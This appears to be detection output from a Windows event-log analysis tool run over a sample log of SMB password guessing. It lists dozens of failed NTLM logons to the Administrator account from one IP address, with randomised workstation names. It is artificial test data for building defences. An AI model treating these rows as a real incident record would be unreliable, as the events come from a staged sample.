2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
